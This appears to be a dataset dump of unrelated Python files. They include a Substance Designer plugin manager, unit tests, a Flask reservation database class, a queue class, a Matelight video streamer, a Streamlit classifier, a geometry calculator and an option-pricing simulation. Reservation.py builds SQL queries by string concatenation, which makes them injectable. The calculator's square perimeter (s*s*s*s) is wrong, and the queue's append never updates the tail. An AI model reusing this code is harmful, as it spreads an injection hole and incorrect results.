'160PS'}\n#car.Audi(*y, **z)\n\n\nprint(\" heeeeelllllllloooooo \")\n\n\n","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"357108840","text":"# ADOBE CONFIDENTIAL\n#\n# Copyright 2019 Adobe\n# All Rights Reserved.\n#\n# NOTICE: Adobe permits you to use, modify, and distribute this file in\n# accordance with the terms of the Adobe license agreement accompanying it.\n# If you have received this file from a source other than Adobe,\n# then your use, modification, or distribution of it requires the prior\n# written permission of Adobe.\n#\n\nimport os\nimport sys\nimport json\n\nimport sd\nfrom PySide2 import QtCore, QtWidgets\n\nfrom .pluginmanagermodel import PluginTreeModel\nfrom .installpackage import installPackage\n\n## Plugin manager dialog.\nclass PluginManagerDialog(QtWidgets.QDialog):\n def __init__(self, pluginMgr, parent=None):\n super(PluginManagerDialog, self).__init__(parent=parent)\n\n self.__pluginMgr = pluginMgr\n\n self.setWindowTitle(self.tr(\"Plugin Manager\"))\n self.setFocusPolicy(QtCore.Qt.NoFocus)\n\n # Create the widgets.\n dialogLayout = QtWidgets.QVBoxLayout(self)\n\n filterEntry = QtWidgets.QLineEdit()\n filterEntry.setPlaceholderText(self.tr(\"Filter\"))\n dialogLayout.addWidget(filterEntry)\n\n self.__model = PluginTreeModel(pluginMgr, self)\n self.__proxyModel = QtCore.QSortFilterProxyModel(self)\n self.__proxyModel.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)\n self.__proxyModel.setSourceModel(self.__model)\n self.__proxyModel.setFilterKeyColumn(0)\n self.__proxyModel.setRecursiveFilteringEnabled(True)\n\n self.__treeView = QtWidgets.QTreeView()\n self.__treeView.setUniformRowHeights(True)\n self.__treeView.setTextElideMode(QtCore.Qt.ElideLeft)\n self.__treeView.setModel(self.__proxyModel)\n self.__treeView.header().setStretchLastSection(False)\n self.__treeView.header().setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)\n self.__treeView.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)\n self.__treeView.sortByColumn(0, QtCore.Qt.AscendingOrder)\n self.__treeView.setSortingEnabled(True)\n self.__treeView.expandAll()\n dialogLayout.addWidget(self.__treeView)\n\n buttonBox = QtWidgets.QDialogButtonBox()\n browseBtn = QtWidgets.QPushButton(self.tr(\"BROWSE...\"))\n buttonBox.addButton(browseBtn, QtWidgets.QDialogButtonBox.ActionRole)\n\n installBtn = QtWidgets.QPushButton(self.tr(\"INSTALL...\"))\n buttonBox.addButton(installBtn, QtWidgets.QDialogButtonBox.ActionRole)\n\n refreshBtn = QtWidgets.QPushButton(self.tr(\"REFRESH\"))\n buttonBox.addButton(refreshBtn, QtWidgets.QDialogButtonBox.ActionRole)\n dialogLayout.addWidget(buttonBox)\n\n # Connect signals.\n filterEntry.textChanged.connect(self.__proxyModel.setFilterFixedString)\n browseBtn.pressed.connect(self.__onBrowsePlugin)\n installBtn.pressed.connect(self.__onInstallPlugin)\n refreshBtn.pressed.connect(self.__onRefreshModel)\n\n self.__treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.__treeView.customContextMenuRequested.connect(self.__onShowContextMenu)\n\n def __onShowContextMenu(self, point):\n index = self.__treeView.indexAt(point)\n index = self.__proxyModel.mapToSource(index)\n\n if not index.isValid() or index.column() != 0:\n return\n\n item = index.internalPointer()\n if item.isRoot():\n return\n\n menu = QtWidgets.QMenu()\n menu.addAction(\n self.tr(\"Show in File Browser...\"),\n lambda: item.showInFileBrowser())\n\n if item.isLeaf() and item.isLoaded():\n menu.addAction(\n self.tr(\"Reload\"),\n lambda: self.__model.reloadPlugin(index))\n\n menu.exec_(self.__treeView.viewport().mapToGlobal(point))\n\n def __onBrowsePlugin(self):\n fileName = QtWidgets.QFileDialog.getOpenFileName(\n self,\n self.tr(\"Open Plugin\"),\n None,\n self.tr(\"Plugin Package (pluginInfo.json);;Python Module (__init__.py);;Python Files (*.py)\"))[0]\n\n if fileName != \"\":\n # Find the plugin name and the directory.\n pluginDir = os.path.dirname(fileName)\n fileName = os.path.basename(fileName)\n\n if fileName == \"pluginInfo.json\":\n # The user picked a plugin installed from a package.\n pluginName = os.path.basename(pluginDir)\n elif fileName == \"__init__.py\":\n # The user picked a module. Adjust the plugin name and dir.\n pluginName = os.path.basename(pluginDir)\n pluginDir = os.path.dirname(pluginDir)\n else:\n # The user picked a python file. Simply remove the python extension.\n pluginName = fileName.replace(\".py\", \"\")\n\n # Add the plugin dir to the path, so that it can be imported.\n if not pluginDir in sys.path:\n sys.path.append(pluginDir)\n\n # Load the plugin and update the model.\n plugin = self.__pluginMgr.loadPlugin(pluginName, pluginDir)\n index = self.__model.newPluginLoaded(plugin)\n\n # Expand the plugin directory group (by default new groups are not expanded).\n proxyIndex = self.__proxyModel.mapFromSource(index)\n self.__treeView.setExpanded(proxyIndex, True)\n\n def __onInstallPlugin(self):\n fileName = QtWidgets.QFileDialog.getOpenFileName(\n self,\n self.tr(\"Install Plugin Package\"),\n None,\n self.tr(\"Plugin Package (*.sdplugin)\"))[0]\n\n if fileName != \"\":\n try:\n index = installPackage(fileName, self.__pluginMgr, self.__model)\n\n # Expand the new plugin directory group (by default new groups are not expanded).\n proxyIndex = self.__proxyModel.mapFromSource(index)\n self.__treeView.setExpanded(proxyIndex, True)\n except Exception as err:\n QtWidgets.QMessageBox.critical(\n self,\n self.tr(\"Error installing plugin package:\"),\n str(err),\n QtWidgets.QMessageBox.Ok)\n\n def __onRefreshModel(self):\n self.__model.refreshModel()\n self.__treeView.expandAll()\n\nclass PluginManagerUI(object):\n __pluginMgr = None\n __uiMgr = None\n __menu = None\n __pluginMgrAct = None\n __dialog = None\n\n @classmethod\n def initialize(cls):\n ctx = sd.getContext()\n app = ctx.getSDApplication()\n\n cls.__uiMgr = app.getQtForPythonUIMgr()\n cls.__pluginMgr = app.getPluginMgr()\n\n if cls.__uiMgr:\n cls.__menu = cls.__uiMgr.findMenuFromObjectName(\"Pfx.Editor.Menu.Tools\")\n if cls.__menu:\n cls.__menu.addSeparator()\n\n cls.__pluginMgrAct = QtWidgets.QAction(\n QtCore.QCoreApplication.translate(\"PluginManagerUI\", \"Plugin Manager...\"),\n cls.__menu)\n cls.__pluginMgrAct.triggered.connect(cls.__onShowPluginManager)\n cls.__menu.addAction(cls.__pluginMgrAct)\n\n @classmethod\n def uninitialize(cls):\n if cls.__pluginMgrAct:\n cls.__menu.removeAction(cls.__pluginMgrAct)\n\n @classmethod\n def __onShowPluginManager(cls):\n if not cls.__dialog:\n cls.__dialog = PluginManagerDialog(cls.__pluginMgr, parent=cls.__uiMgr.getMainWindow())\n cls.__dialog.setAttribute(QtCore.Qt.WA_DeleteOnClose, False)\n cls.__dialog.setAttribute(QtCore.Qt.WA_ShowWithoutActivating, True)\n cls.__dialog.resize(550, 350)\n\n cls.__dialog.show()\n","sub_path":"SDPython/designer/pluginmanagerui.py","file_name":"pluginmanagerui.py","file_ext":"py","file_size_in_byte":7680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"423661541","text":"import app\nimport json\nfrom mock import patch\nimport os\nimport unittest\n\n\nclass TestGettingInfo(unittest.TestCase):\n\n def setUp(self):\n current_path = str(os.path.dirname(os.path.abspath(__file__)))\n f_directories = os.path.join(current_path, 'fixtures/directories.json')\n f_documents = os.path.join(current_path, 'fixtures/documents.json')\n with open(f_directories, 'r+') as f:\n self.dirs = json.load(f)\n with open(f_documents, 'r+') as f:\n self.docs = json.load(f)\n\n def tearDown(self):\n current_path = str(os.path.dirname(os.path.abspath(__file__)))\n f_directories = os.path.join(current_path, 'fixtures/directories.json')\n f_documents = os.path.join(current_path, 'fixtures/documents.json')\n with open(f_documents, 'r') as f:\n app.documents = json.load(f)\n with open(f_directories, 'r+') as f:\n app.directories = json.load(f)\n\n @patch('builtins.input', side_effect=['11-2'])\n def test_get_name_from_number(self, input):\n self.assertEqual(app.get_doc_owner_name(), 'Геннадий Покемонов')\n\n def test_get_names(self, *args):\n self.assertEqual(sorted(list(app.get_all_doc_owners_names())), sorted([doc['name'] for doc in self.docs]))\n\n def test_show_info(self):\n for doc in self.docs:\n info = '{} \"{}\" \"{}\"'.format(doc['type'], doc['number'], doc['name'])\n self.assertEqual(app.show_document_info(doc), info)\n\n def test_add_doc(self):\n app.append_doc_to_shelf('3365', '3')\n self.assertEqual(app.directories['3'][-1], '3365')\n\n @patch('builtins.input', side_effect=['11-2'])\n def test_del_doc(self, input):\n app.delete_doc()\n self.assertEqual(len(app.documents), 2)\n\n def test_remove_from_shelf(self):\n app.remove_doc_from_shelf('10006')\n self.assertFalse(app.directories['2'])\n\n\nif __name__ == '__main__':\n suite_1 = unittest.TestLoader().loadTestsFromTestCase(TestGettingInfo)\n unittest.TextTestRunner(verbosity=2).run(suite_1)\n","sub_path":"Netology_homeworks/Homework_tests/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548805729","text":"from database import *\nfrom flask_login import UserMixin\n\nclass MedicalReport(UserMixin):\n def __init__(self, reservationid, patientid, hospitalid, doctorid, departmentid, diseaseid, comment, updatedate, createdate, reservationdate, reservationhour):\n self.ReservationID = reservationid\n self.PatientID = patientid\n self.HospitalID = hospitalid\n self.DoctorID = doctorid\n self.DepartmentID = departmentid\n self.DiseaeID = diseaseid\n self.Comment = comment\n self.UpdateDate = updatedate\n self.CreateDate = createdate\n self.ReservationDate = reservationdate\n self.ReservationHour = reservationhour\n\nclass ReservationDatabase:\n @classmethod\n def add_reservation(cls, patientid, hospitalid, doctorid, departmentid, diseaseid, comment, reservationdate, reservationhour):\n with dbapi2.connect(database.config) as connection:\n cursor = connection.cursor()\n query = \"\"\"INSERT INTO Reservation(PatientID, HospitalID, DoctorID, DepartmentID, DiseaseID, Comment, CreateDate, ReservationDate, ReservationHour) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n try:\n cursor.execute(query, (str(patientid), str(hospitalid), str(doctorid), str(departmentid), str(diseaseid), str(comment), datetime.datetime.now(), str(reservationdate), str(reservationhour)))\n except dbapi2.Error:\n connection.rollback()\n return -1\n else:\n connection.commit()\n cursor.close()\n return 1\n @classmethod\n def update_reservation(cls, reservationid, patientid, hospitalid, doctorid, departmentid, diseaseid, comment, reservationdate, reservationhour):\n with dbapi2.connect(database.config) as connection:\n cursor = connection.cursor()\n\n query = 'UPDATE Reservation SET UpdateDate = ' + \"'\" + str(datetime.datetime.now()) + \"'\"\n\n if patientid != '' and patientid is not None:\n query = query + \", PatientID = '\" + str(patientid) + \"'\"\n if hospitalid != '' and hospitalid is not None:\n query = query + \", HospitalID = '\" + str(hospitalid) + \"'\"\n if doctorid != '' and doctorid is not None:\n query = query + \", DoctorID = '\" + str(doctorid) + \"'\"\n if departmentid != '' and departmentid is not None:\n query = query + \", DepartmentID = '\" + str(departmentid) + \"'\"\n if diseaseid != '' and diseaseid is not None:\n query = query + \", DiseaseID = '\" + str(diseaseid) + \"'\"\n if comment != '' and comment is not None:\n query = query + \", Comment = '\" + str(comment) + \"'\"\n if reservationdate != '' and reservationdate is not None:\n query = query + \", ReservationDate = '\" + str(reservationdate) + \"'\"\n if reservationhour != '' and reservationhour is not None:\n query = query + \", ReservationHour = '\" + str(reservationhour) + \"'\"\n query = query + ' WHERE ReservationId = ' + str(reservationid)\n\n try:\n cursor.execute(query)\n except dbapi2.Error:\n connection.rollback()\n else:\n connection.commit()\n cursor.close()\n return\n\n @classmethod\n def select_all_reservation_info(cls, patientid):\n with dbapi2.connect(database.config) as connection:\n cursor = connection.cursor()\n reservationInfo = None\n\n if patientid == '' or patientid == None:\n query = \"\"\"SELECT * FROM Reservation\"\"\"\n else:\n query = 'SELECT * FROM ReservationInfo WHERE PatientID = ' + patientid\n try:\n cursor.execute(query,)\n reservationInfo = cursor.fetchall()\n\n except dbapi2.Error:\n connection.rollback()\n else:\n connection.commit()\n\n if reservationInfo:\n return reservationInfo\n else:\n return -1\n\n @classmethod\n def select_reservation_info(cls, patientid):\n with dbapi2.connect(database.config) as connection:\n cursor = connection.cursor()\n reservationInfo = None\n\n query = \"\"\"SELECT res.PatientID, res.ReservationID, res.DoctorID, res.HospitalID, res.DepartmentID, \n res.DiseaseID, res.Comment, res.ReservationDate, res.ReservationHour \n FROM PatientInfo p, Reservation res\n WHERE p.PatientID = res.PatientID AND p.PatientID = %s\"\"\"\n try:\n cursor.execute(query, str(patientid))\n reservationInfo = cursor.fetchone()\n\n except dbapi2.Error:\n connection.rollback()\n else:\n connection.commit()\n\n if reservationInfo:\n reservationInfo2 = [reservationInfo[0], reservationInfo[1], reservationInfo[2], reservationInfo[3], reservationInfo[4],\n reservationInfo[5], reservationInfo[6], reservationInfo[7], reservationInfo[8]]\n return reservationInfo2\n else:\n return []","sub_path":"Reservation.py","file_name":"Reservation.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"465359324","text":"from typing import Any\n\n\nclass Node:\n \"\"\"A node of a doubly linked list has a value and two node references\"\"\"\n def __init__(self, value: Any) -> None:\n self.value: Any = value\n self.prev: Node = None\n self.next: Node = None\n\n\nclass SimpleQueue:\n \"\"\"A doubly linked list\"\"\"\n def __init__(self) -> None:\n self._head: Node = None\n self._tail: Node = None\n\n def append(self, value: Any) -> None:\n \"\"\"Adds node with specified value at end of queue\"\"\"\n new_node = Node(value)\n try: # Assume queue is not empty\n new_node.next = self._tail\n self._tail.prev = new_node\n except AttributeError: # Queue is empty\n self._head = new_node\n self._tail = new_node\n\n def popleft(self) -> Any:\n \"\"\"Removes node at beginning of queue and returns its value\"\"\"\n value = self._head.value\n self._head = self._head.prev\n try: # Delete reference to removed node\n self._head.next = None\n except AttributeError: # Queue became empty\n self._tail = None\n return value\n\n \n\n","sub_path":"week3/simplequeue.py","file_name":"simplequeue.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602843463","text":"import youtube_dl\nimport cv2\nimport numpy as np\nimport sys\nimport matelight\nimport time\n\nip = \"api.matelight.rocks\"\nport = 1337\n\nlink = \"\"\n\ncanny = True\n\nwidth = 0\nheight = 0\n\nframeskip = 1000\n\n\nif not len(sys.argv) == 5:\n\tprint(\"Usage: %s \" % (sys.argv[0]))\n\texit(1)\n\nelse:\n\tip = sys.argv[1]\n\tport = int(sys.argv[2])\n\n\tlink = sys.argv[3]\n\n\tcanny = sys.argv[4].lower() == \"true\"\n\n\twidth = 40\n\theight = 16\n\nydl = youtube_dl.YoutubeDL({'outtmpl': '%(id)s%(ext)s'})\n\nwith ydl:\n result = ydl.extract_info(\n link,\n download=False # We just want to extract the info\n )\n\nif 'entries' in result:\n # Can be a playlist or a list of videos\n v = result['entries']\n t = \"playlist\"\nelse:\n # Just a video\n v = result\n t = \"single\"\n\ndef processVideo(video):\n\turl = video['requested_formats'][0]['url']\n\tfps = int(video['fps'])\n\n\tdelay = 0\n\n\tvid = cv2.VideoCapture(url)\n\tret = True\n\n\tlframe = frame = np.zeros((height, width,1 if canny else 3), np.uint8)\n\n\twhile ret:\n\t\t#print(\"-\")\n\t\tpre_frame_time = time.time()\n\n\t\tlframe = frame\n\n\t\tret, frame = vid.read()\n\t\tframe = cv2.resize(frame, (width, height))\n\n\t\tscreen = [[(0, 0, 0) for x in range(0, width)] for y in range(0, height)]\n\t\tfor x in range(0, width):\n\t\t\tfor y in range(0, height):\n\t\t\t\t#print((frame[y][x][0], frame[y][x][1], frame[y][x][2]))\n\t\t\t\tscreen[y][x] = (frame[y][x][2], frame[y][x][1], frame[y][x][0])\n\t\tmatelight.send_frame(frame)\n\t\tdt = time.time() - pre_frame_time\n\t\tframes_per_second = 1 / float(dt)\n\n\t\tprint(\"%d fps\" % (frames_per_second))\n\n\nmatelight.open_socket(ip, port)\n\nif t == \"single\":\n\tprocessVideo(v)\nelif t == \"playlist\":\n\tfor video_ in v:\n\t\tprocessVideo(video_)\n","sub_path":"youtubemate.py","file_name":"youtubemate.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251228951","text":"# Dependencies and Libraries\nfrom fastai.vision.all import *\nfrom fastai.vision.widgets import *\nfrom io import BytesIO, StringIO\n\nimport os\nimport sys\nimport streamlit as st\nimport pandas as pd\n\nst.set_page_config(\n page_title=None,\n page_icon=\"🖼️\", \n layout='centered', \n initial_sidebar_state='auto')\n\nSTYLE = \"\"\"\n\n\"\"\"\n\n# Load model\npath = Path()\nlearn_inf = load_learner(path/'export.pkl', cpu=True)\n\n@st.cache(allow_output_mutation=True)\nclass FileUpload(object):\n def __init__(self):\n self.fileTypes = ['png', 'jpg']\n\n def app(): \n st.write(\"\"\"\n # Video Conference Glitch Detection\n Task Item #5 Project - Convolutional Neural Network\n \"\"\")\n st.write(\"\"\"\n A prototype image or video classifier that can determine if an uploaded image has visual glitches or whether a video contains graphical glitches.\\n\n TODO\\n\n - Video Upload\\n\n - Incorporate more models for other glitches\\n\n - Dashboard for descriptive data analytics\\n\n \"\"\")\n\n st.markdown(STYLE, unsafe_allow_html=True)\n file = st.file_uploader(\"Upload image file\", type=['png', 'jpg'])\n show_file = st.empty()\n\n if not file:\n show_file.info(\"Please upload an image file : {}\".format(' '.join(['png', 'jpg'])))\n return\n content = file.getvalue()\n\n if isinstance(file, BytesIO):\n img = PILImage.create(file)\n pred,pred_idx,probs = learn_inf.predict(img)\n prediction = f'Prediction: {pred}; Probability: {probs[pred_idx]:.04f}'\n st.write(prediction)\n show_file.image(file)\n \n else:\n df = pd.read_csv(file)\n st.dataframe(df.head(2))\n \n file.close()\n\nif __name__ == \"__main__\":\n app = FileUpload()\n FileUpload.app()","sub_path":"StreamlitDeploy.py","file_name":"StreamlitDeploy.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"223254517","text":"print(\"### Kalkulator Bangun Datar ###\")\nprint(\"Anda dapat menghitung Luas & Keliling bangun datar\")\nprint(\"L = Luas\")\nprint(\"K = Keliling\")\njenisKalkulator = str(input(\"Masukkan Kode : \"))\n\nif jenisKalkulator == \"l\":\n print(\"Anda memilih untuk menghitung Luas\")\n print(\"KODE :\")\n print(\"1. Persegi\")\n print(\"2. Persegi Panjang\")\n print(\"3. Jajar Genjang\")\n print(\"4. Trapesium\")\n print(\"5. Layang-Layang\")\n print(\"6. Segitiga\")\n print(\"7. Belah Ketupat\")\n print(\"8. Lingkaran\")\n jenisBangun = int(input(\"Masukkan Kode : \"))\n\n if jenisBangun == 1:\n s = int(input(\"Sisi bangun : \"))\n\n luasPersegi = (s * s)\n print(\"Hasil luas persegi : \", luasPersegi)\n\n if jenisBangun == 2:\n p = int(input(\"Panjang bangun : \"))\n l = int(input(\"Lebar bangun : \"))\n\n luasPersegipanjang = (p * l)\n print(\"Hasil luas persegi panjang : \", luasPersegipanjang)\n\n if jenisBangun == 3:\n a = int(input(\"Alas bangun : \"))\n t = int(input(\"Tinggi bangun : \"))\n\n luasJajargenjang = (a * t)\n print(\"Hasil luas jajar genjang\", luasJajargenjang)\n\n if jenisBangun == 4:\n jumsissej = int(input(\"Jumlah sisi sejajar : \"))\n t = int(input(\"Tinggi bangun : \"))\n\n luasTrapesium = (0.5 * jumsissej * t)\n print(\"Hasil luas trapesium : \", luasTrapesium)\n\n if jenisBangun == 5:\n d1 = int(input(\"Diagonal 1 : \"))\n d2 = int(input(\"Diagonal 2 : \"))\n\n luasLayang = (0.5 * d1 * d2)\n print(\"Hasil Luas layang-layang : \", luasLayang)\n\n if jenisBangun == 6:\n a = int(input(\"Alas bangun : \"))\n t = int(input(\"Tinggi bangun : \"))\n\n luasSegitiga = (0.5 * a * t)\n print(\"Hasil luas segitiga : \", luasSegitiga)\n\n if jenisBangun == 7:\n d1 = int(input(\"Diagonal 1 : \"))\n d2 = int(input(\"Diagonal 2 : \"))\n\n luasBelah = (0.5 * d1 * d2)\n print(\"Hasil luas belah ketupat : \", luasBelah)\n\n if jenisBangun == 8:\n r = int(input(\"Jari-Jari lingkaran : \"))\n\n luasLingkaran = (3.14 * r * r)\n print(\"Hasil luas lingkaran : \", luasLingkaran)\n\n\nif jenisKalkulator == \"k\":\n print(\"Anda memilih untuk menghitung Keliling\")\n print(\"KODE :\")\n print(\"1. Persegi\")\n print(\"2. Persegi Panjang\")\n print(\"3. Jajar Genjang\")\n print(\"4. Trapesium\")\n print(\"5. Layang-Layang\")\n print(\"6. Segitiga\")\n print(\"7. Belah Ketupat\")\n print(\"8. Lingkaran\")\n jenisBangun = int(input(\"Masukkan Kode : \"))\n\n if jenisBangun == 1:\n s = int(input(\"Sisi bangun : \"))\n\n kelPersegi = (s * s * s * s)\n print(\"Hasil keliling persegi : \", kelPersegi)\n\n if jenisBangun == 2:\n p = int(input(\"Panjang bangun : \"))\n l = int(input(\"Lebar bangun : \"))\n\n kelPersegipanjang = (2 * (p + l))\n print(\"Hasil keliling persegi panjang : \", kelPersegipanjang)\n\n if jenisBangun == 3:\n s1 = int(input(\"Sisi kanan : \"))\n s2 = int(input(\"Sisi kiri : \"))\n s3 = int(input(\"Sisi atas : \"))\n s4 = int(input(\"Sisi bawah : \"))\n\n kelJajargenjang = (s1 + s2 + s3 + s4)\n print(\"Hasil keliling jajar genjang\", kelJajargenjang)\n\n if jenisBangun == 4:\n s1 = int(input(\"Sisi 1 : \"))\n s2 = int(input(\"Sisi 2 : \"))\n s3 = int(input(\"Sisi 3 : \"))\n s4 = int(input(\"Sisi 4 : \"))\n\n kelTrapesium = (s1 + s2 + s3 + s4)\n print(\"Hasil keliling trapesium : \", kelTrapesium)\n\n if jenisBangun == 5:\n ab = int(input(\"AB : \"))\n bc = int(input(\"BC : \"))\n\n kelLayang = (2 * (ab + bc))\n print(\"Hasil keliling layang-layang : \", kelLayang)\n\n if jenisBangun == 6:\n a = int(input(\"Alas bangun : \"))\n t = int(input(\"Tinggi bangun : \"))\n d = int(input(\"Diagonal bagun : \"))\n\n kelSegitiga = (a + t + d)\n print(\"Hasil keliling segitiga : \", kelSegitiga)\n\n if jenisBangun == 7:\n s = int(input(\"Sisi bangun : \"))\n\n kelBelah = (4 * s)\n print(\"Hasil keliling belah ketupat : \", kelBelah)\n\n if jenisBangun == 8:\n d = int(input(\"Diameter lingkaran : \"))\n\n kelLingkaran = (3.14 * d)\n print(\"Hasil keliling lingkaran : \", kelLingkaran)","sub_path":"Bangun_Datar.py","file_name":"Bangun_Datar.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"204874690","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\n#A. Buchner (2015) Equilibrium option pricing: A Monte Carlo approach\r\n\r\nimport os\r\nimport math\r\nimport numpy as np\r\nnp.set_printoptions(precision=3)\r\nimport itertools as it\r\nimport pandas as pd\r\nfrom time import time\r\n# Inverse of the CDF of the standard normal distribution \r\nfrom scipy.stats import norm\r\n#ENTER PATH:\r\npath =r'D:\\Google Drive\\M2 P1\\Reference\\Theorie Option_MYannick\\Articles\\CODE'\r\n\r\n\r\n#Heston(1993) Diffusion Parameters\r\nv0 = 0.1\r\nkappa_v = 0.5\r\n# sigma_v = 0.05\r\nrho_vs = -0.5\r\ntheta_v = 0.1\r\nS0 = 100\r\nmu_s = 0.1241\r\n\r\n#Market Price Diffusion Model Parameters \r\nM0 = 100\r\nmu_m = 0.1\r\nsigma_m = 0.12\r\nrho_ms = 0.5\r\nrho_mv = 0\r\n\r\n#General Parameters Simulation\r\nT = 1\r\nnsteps = 250\r\n# paths_list = [1000, 10000, 100000] #1000, 10000, 100000\r\n# b_list = [1, 3, 5, 10] #1, 3, 5, 10\r\n# K_list = [80, 100, 120] #80, 100, 120\r\nnp.random.seed(200000)\r\n# volatility = ['stochastic', 'constant'] #'stochastic', 'constant'\r\n# option_type = ['Call', 'Put'] #'Call', 'Put'\r\n\r\n#Square root diffusion\r\ndef SRD_generate_paths(v0, kappa_v, theta_v, sigma_v, T, nsteps, I, rand,\r\n row, cho_matrix) :\r\n \r\n dt = T / nsteps\r\n v = np.zeros((nsteps + 1, I), dtype=np.float)\r\n v[0] = v0\r\n v_p = np.zeros_like(v)\r\n v_p[0] = v0\r\n sdt = math.sqrt(dt)\r\n for t in range(1, nsteps + 1):\r\n ran = np.dot(cho_matrix, rand[:, t])\r\n v_p[t] = (v_p[t - 1] + kappa_v *\r\n (theta_v - np.maximum(0, v_p[t - 1])) * dt +\r\n np.sqrt(np.maximum(0, v_p[t - 1])) * sigma_v * ran[row] * sdt)\r\n v[t] = np.maximum(0, v_p[t])\r\n return(v)\r\n\r\n#Stock price diffusion\r\ndef H93_generate_paths(S0, mu_s, v, T, nsteps, I, rand, row, volatility,\r\n cho_matrix):\r\n \r\n dt = T / nsteps\r\n S = np.zeros((nsteps + 1, I), dtype=np.float)\r\n S[0] = S0\r\n sdt = math.sqrt(dt)\r\n for t in range(1, nsteps + 1):\r\n ran = np.dot(cho_matrix, rand[:, t])\r\n if volatility == 'stochastic':\r\n S[t] = S[t - 1] * (1 + mu_s * dt + np.sqrt(v[t - 1]) *\r\n ran[row] * sdt)\r\n elif volatility == 'constant':\r\n S[t] = S[t - 1] * (1 + mu_s * dt + np.sqrt(v0) *\r\n ran[row] * sdt)\r\n return(S)\r\n \r\n#Market price diffusion\r\ndef Mkt_generate_paths(M0, mu_m, sigma_m, T, nsteps, I, rand, row, cho_matrix):\r\n \r\n dt = T / nsteps\r\n M = np.zeros((nsteps + 1, I), dtype=np.float)\r\n M[0] = M0\r\n sdt = math.sqrt(dt)\r\n for t in range(1, nsteps + 1):\r\n ran = np.dot(cho_matrix, rand[:, t])\r\n M[t] = M[t - 1] * (1 + mu_m * dt + sigma_m * ran[row] * sdt)\r\n return(M)\r\n \r\n#Random number generator\r\ndef random_number_generator(nsteps, I):\r\n rand = np.random.standard_normal((3, nsteps + 1, I))\r\n return(rand)\r\n\r\n\r\n#VALUATION\r\n#=========\r\n\r\nt0 = time()\r\n \r\nresults = pd.DataFrame()\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n # Correlation Matrix\r\n covariance_matrix = np.zeros((3, 3), dtype=np.float)\r\n covariance_matrix[0] = [1.0, rho_vs, rho_ms]\r\n covariance_matrix[1] = [rho_vs, 1.0, rho_mv]\r\n covariance_matrix[2] = [rho_ms, rho_mv, 1.0]\r\n cho_matrix = np.linalg.cholesky(covariance_matrix)\r\n\r\n def final_result(option_type,paths_list, b_list, K_list, volatility,sigma_v): \r\n results = pd.DataFrame() \r\n for alpha in it.product(option_type,paths_list, b_list, K_list, volatility):\r\n print('\\n', alpha, '\\n')\r\n opt,I, b, K, vol= alpha\r\n \r\n #memory clean-up\r\n v, S, M, rand, st_dev = 0.0, 0.0, 0.0, 0.0, 0.0\r\n C_bar, R_bar, pi, r_m, r_mi = 0.0, 0.0, 0.0, 0.0, 0.0\r\n \r\n #random numbers\r\n rand = random_number_generator(nsteps, I)\r\n #volatility paths\r\n v = SRD_generate_paths(v0, kappa_v, theta_v, sigma_v, T,\r\n nsteps, I, rand, 1, cho_matrix)\r\n #stock price paths\r\n S = H93_generate_paths(S0, mu_s, v, T, nsteps, I, rand, 0,\r\n vol, cho_matrix)\r\n #market price paths\r\n M = Mkt_generate_paths(M0, mu_m, sigma_m, T, nsteps, I, rand, 2,\r\n cho_matrix)\r\n \r\n #market return over [0,T]\r\n r_m = M[nsteps, :] / M[0, :] - 1\r\n #MC estimator\r\n r_mi = (1 + r_m)**(1 - b)\r\n R_bar = np.sum(r_mi) / I\r\n if opt == 'Call':\r\n pi = np.maximum(S[-1] - K, 0) / (1 + r_m)**b\r\n elif opt == 'Put':\r\n pi = np.maximum(-S[-1] + K, 0) / (1 + r_m)**b\r\n C0 = np.sum(pi) / np.sum(r_mi)\r\n #standard deviation\r\n C_bar = np.sum(pi) / I\r\n st_dev = (1 / (I * R_bar**2)) * np.sum((pi - r_mi *\r\n C_bar / R_bar)**2)\r\n st_dev = np.sqrt(st_dev) / np.sqrt(I)\r\n #Confidence intervals\r\n C0_inf = C0 - norm.ppf(0.05/2) * st_dev\r\n C0_sup = C0 + norm.ppf(0.05/2) * st_dev\r\n \r\n res = pd.DataFrame({'paths': I, 'strike': K,\r\n 'option value': C0,'stdev': st_dev,\r\n 'IC inf': C0_inf,'IC sup': C0_sup,\r\n 'relative risk aversion' : b, 'option type':\r\n opt, 'volatility': vol}, index= [0,])\r\n \r\n results = results.append(res, ignore_index=True)\r\n return(results)\r\n\r\n\r\n# Create function to save result to working directory\r\n def save_result(res, file_name):\r\n res.to_csv(os.path.join(path, file_name), header=True, index=None, sep=';')\r\n\r\n\r\n# RUN and SAVE RESULTS\r\n table1 = final_result(['Call'],[1000, 10000,100000],[5],[80,100,120],['stochastic'],[0.05])\r\n table2 = final_result(['Call','Put'],[100000],[1,3,5,10],[80,100,120],['stochastic'],[0.05])\r\n table3 = final_result(['Call','Put'],[100000],[3,5],[80,100,120],['constant','stochastic'],[0.2])\r\n\r\n save_result(table1, 'Table 1.csv')\r\n save_result(table2, 'Table 2.csv')\r\n save_result(table3, 'Table 3.csv')\r\n \r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n 